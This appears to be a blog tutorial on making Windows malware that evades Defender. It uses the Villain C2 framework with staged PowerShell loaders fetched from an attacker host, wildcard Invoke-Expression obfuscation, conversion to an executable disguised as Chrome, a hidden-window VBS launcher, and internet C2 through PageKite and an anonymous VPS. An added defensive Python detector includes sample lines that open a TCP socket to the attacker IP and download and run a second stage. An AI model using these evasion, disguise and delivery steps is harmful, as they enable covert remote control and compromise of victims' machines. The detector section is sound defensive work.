Creating Undetectable Windows Malware (Villain C2 Framework + PowerShell Obfuscation + Undetectable Delivery)
DISCLAIMER: Using these tools and methods against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using these tools and methods.
Anti-virus products and Windows Defender use a combination of signature-based detection, behavior-based detection and, today, AI-based analysis to detect and block malware or C2 connection attempts. Typically, signature-based detection is the easiest to bypass; attackers find it much harder when the host dynamically analyzes a script before it executes, using something like AMSI. I found this cool new tool yesterday called Villain and wanted to find a way to use it to bypass modern AV or, at the very least, an up-to-date Windows Defender, which focuses on real-time threats.
The framework is extremely easy to use: just generate a payload and paste it on the target, and it even sets up the listeners for you! However, one thing you'll notice when doing this with Windows Defender enabled is that the default output is quickly flagged as malicious:
I decided to do some research on obfuscation techniques and found this resource by the same creator:
I did a couple of things first to try to change the signature:
- Inserted random comments and spaces in the script
- Created random hex-encoded variable names
- Inserted random quotes inside iex and pwd
None of these seemed to work. About 9 months ago in 2023, you could have just done simple things in the script like changing iex to i''e''x or changing the default variable names like $data to $3e59da34d2, but it's not that simple today. Creating malware that won't be flagged in 2024 takes some trial and error.
Next I decided to try splitting up the command arguments to determine at which point AV detected that the script was malicious. I determined that separating the first variable, which creates a TCPClient socket to my attacker host, from the rest of the script actually didn't raise flags and I received a shell on Villain.
Now I needed a way to let these two parts of the Villain PS script run together but execute separately, so I decided to use the Get-Command technique with wildcards from the resource mentioned above. The & operator runs the commands as jobs. Basically, it retrieves the string itself (our scripts) from the indicated URI and then runs that string as a command with Invoke-Expression, which is also used with a wildcard to bypass detection. The two Get-Command calls look weird like this to decrease the Shannon entropy that might otherwise be too high and get detected by AV:
To actually execute this on the Windows host from the command line, I needed to do a couple of things:
1. I created two PS scripts called stage1.ps1 and stage2.ps1, which contain the first and second part of the Villain PS script I created, respectively (I added the other obfuscation techniques in there just for PoC, but it's not required). These will be run on the victim with IP 10.0.2.5.
2. Host these scripts on a web server on my attacker host, which has IP 10.0.2.9 (over a non-flagged port like 80 or 443), to serve them to the victim.
Wait, this is great, but I want to receive a shell when a user downloads or opens something inconspicuous. To do this, I used Invoke-PS2EXE on my Windows host to convert the PS two-liner above to a Windows executable and then used WinRAR to make it look like a normal Chrome executable (this will be another post if you don't know how).
One thing I noticed is that when a user opened the malicious Chrome executable, a command window would pop up that the user could easily click out of and end my shell session. To get around this, I packaged a simple VBS script with the malicious executable and a clean Chrome browser (in WinRAR) that would simply run the malicious executable with no window popup, not giving the user the power to stop our shell :)
Now it's just a matter of social engineering a way to get a user to download this seemingly innocent executable, or putting it there yourself with an existing foothold. Windows Defender is active on the victim.
When a user double-clicks our malicious Chrome executable, stage1.ps1 and stage2.ps1 are downloaded from our server and executed, then a session is created on Villain, and finally Google Chrome opens like normal for the user.
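The split-stage trick above works against per-script signature matching because the socket setup and the loader are never seen in the same block. From the defender's side, the natural counter is to triage PowerShell script-block log events (Event ID 4104 style) per process rather than per block, so that a TCPClient creation in one block and a wildcard-resolved Invoke-Expression plus remote download in the next are scored together. The example below is added here and is not code from the post or from the Villain project; the log events are constructed (they reuse the post's attacker IP 10.0.2.9 and stage2.ps1 name purely as sample values) and the indicator weights and threshold are an assumed scoring scheme, not a vendor rule.

```python
"""Triage PowerShell script-block log events for staged reverse-shell
indicators, correlating blocks per process so that split stages are caught.

Added example for this post; the sample events and weights are constructed.
"""
import re
from collections import defaultdict

# Each indicator: (label, weight, regex). Weights are an assumed scheme.
INDICATORS = [
    # raw socket creation, the piece the post found harmless on its own
    ("tcp_client", 3, re.compile(r"Net\.Sockets\.TCPClient", re.I)),
    # string-to-code execution, plain or aliased
    ("invoke_expression", 2, re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)),
    # fetching script text from a remote host
    ("remote_download", 2, re.compile(
        r"DownloadString|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I)),
    # cmdlet name resolved through Get-Command with a wildcard argument
    ("wildcard_cmdlet", 3, re.compile(r"Get-Command\s+[^\s;()]*\*", re.I)),
    # URL pointing at a bare IPv4 address instead of a hostname
    ("bare_ip_url", 1, re.compile(
        r"https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)", re.I)),
    # empty quote pairs splitting an identifier, e.g. i''e''x
    ("split_token", 2, re.compile(r"[A-Za-z](?:''|\"\")[A-Za-z]")),
]
_WEIGHTS = {label: w for label, w, _rx in INDICATORS}


def analyze(text):
    """Return the indicator labels matched by a single script block."""
    return [label for label, _w, rx in INDICATORS if rx.search(text)]


def score(labels):
    """Sum the weights of a set of indicator labels."""
    return sum(_WEIGHTS[label] for label in labels)


def correlate(events, threshold=4):
    """Group script blocks by process id and score the union of indicators.

    events: iterable of dicts with 'pid' and 'text' keys.
    Returns {pid: (score, sorted_labels)} for processes at or over threshold.
    """
    per_pid = defaultdict(set)
    for ev in events:
        per_pid[ev["pid"]].update(analyze(ev["text"]))
    flagged = {}
    for pid, labels in per_pid.items():
        total = score(labels)
        if total >= threshold:
            flagged[pid] = (total, sorted(labels))
    return flagged


# Constructed sample events (not captured logs). pid 1001 is routine admin
# activity; pid 2042 splits the socket and the loader across two blocks.
SAMPLE_EVENTS = [
    {"pid": 1001, "text": "Get-ChildItem C:\\Users\\admin\\Documents -Recurse | Measure-Object"},
    {"pid": 1001, "text": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"pid": 2042, "text": "$client = New-Object System.Net.Sockets.TCPClient('10.0.2.9', 4443)"},
    {"pid": 2042, "text": "$s = (New-Object Net.WebClient).DownloadString('http://10.0.2.9/stage2.ps1'); "
                          "& (Get-Command *-Expression) $s"},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        labels = analyze(ev["text"])
        print(f"pid {ev['pid']} block score {score(labels)}: {labels}")
    print("flagged per process:", correlate(SAMPLE_EVENTS))
```

Run on the sample, the socket-only block scores 3 and stays under the threshold on its own, which is exactly the gap the post exploits; the per-process union for pid 2042 scores 9 and is flagged. In a real deployment the grouping key would be the script-block event's process id together with a short time window, and the indicator list would be tuned against your own baseline of legitimate admin scripts.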
Attackers are going to have to work harder to bypass updated defenses this year, but it's nowhere near impossible, even with real-time analysis. I hope you enjoyed this post!
BONUS: C2 over the Internet
PageKite can be used to deliver and execute our PS scripts over the internet instead of the local network. Sign up with a valid email for a 30-day free trial. We can also use a cheap VPS with a public IP address to catch our Villain-generated netcat reverse shell.
First, change the attacker host's local IP in the script to the IP of the public-facing VPS instance so we can connect over the internet:
Then, create a web server hosting the files stage1.ps1 and stage2.ps1 on our PageKite FQDN, called something like python3.pagekite.me.
Lastly, change the test.ps1 script to grab the files from PageKite instead of the local host. Then convert it into an executable like before and send it to the victim.
On our anonymous VPS instance, open Villain and wait for the connection over the internet (you might have to do some port-forwarding configuration).
And now we've received a reverse shell by using PageKite and a VPS, which an attacker can create anonymously and discard after actions-on :)